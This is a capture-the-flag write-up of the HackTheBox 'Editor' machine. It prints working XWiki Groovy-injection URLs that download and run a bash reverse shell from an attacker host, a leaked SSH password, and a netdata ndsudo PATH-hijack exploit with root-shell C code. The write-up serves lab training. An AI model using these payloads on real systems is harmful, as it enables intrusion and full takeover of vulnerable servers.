Editor HackTheBox Writeup

HackTheBox - Editor

Reccon

As usual we will start with the Nmap

nmap -sC -sV --min-rate 5000 -T5 -Pn -p- 10.10.11.80

Looking at the result , we have

  • 22/tcp open ssh OpenSSH
  • 80/tcp open http nginx
  • 8080/tcp open http Jetty

Let add editor.htb in our hosts file

echo "10.10.11.80 editor.htb" | sudo tee -a /etc/hosts

WebEnumeration

On port 80 we have

And on port 8080

I saw the Xwiki version in the bottom , when i googled about it , i came acrros this CVE 2025-24893

and for the exploit , i got this Exploit To get the shell , we first need to create shell.sh

#!/bin/bash
bash -i >& /dev/tcp/<YOUR_IP>/9001 0>&1

After creating a shell.sh start a python server in you local machine

python3 -m http.server 8000

Then in the browser Paste this encoded URL

 http://editor.htb:8080/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln("wget%20-qO%20/tmp/shell.sh%20http://10.10.14.205:8000/shell.sh".execute().text)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D

Then have a listener of your choice , mine is net-cat

rlwrap nc -lvnp 9001

Then execute your payload

http://editor.htb:8080/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22bash%20/tmp/shell.sh%22.execute().text)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D

And Boom u got your shell

In /etc/passwd u will find that there is a user called oliver

oliver:x:1000:1000:,,,:/home/oliver:/bin/bash

Then in the WEB-INF u will find hibernate.cfg.xml In which u will find the password of Oliver

theEd1t0rTeam99


ssh oliver@editor.htb

Getting into the user , we got our user.txt

Getting the Root

On Localhost at port 19999 there is a service running called netdata

So we did some Port forwarding

ssh -L 19999:127.0.0.1:19999 oliver@editor.htb

Paste this in your browser

http://localhost:19999/

Clicking on the Please update them , we get the version 1.45.2

After digging the internet we get this CVE-2024-32019 Oliver has permission to run ndsudo:

  1. Place an executable that is on ndsudo’s list of commands (e.g. nvme) in a writable path
  2. Set the PATH environment variable so that it contains this path
  3. Run ndsudo with a command that will run the aforementioned executable First we need to make an exploit.c binary , then compile it
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);       // Switch to root
    setgid(0);       // Switch group to root
    system("/bin/bash");  // Spawn a root shell
    return 0;
}

Then compile it

gcc -o nvme exploit.c

Then we need to upload the exploit.c in Oliver’s /tmp directory , for that we will use python server

python3 -m http.server 8000

Then the following

curl http://<YOUR-IP>:8000/nvme -o nvme
chmod +x nvme
export PATH=/tmp:$PATH
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list

And Boom we got the root.txt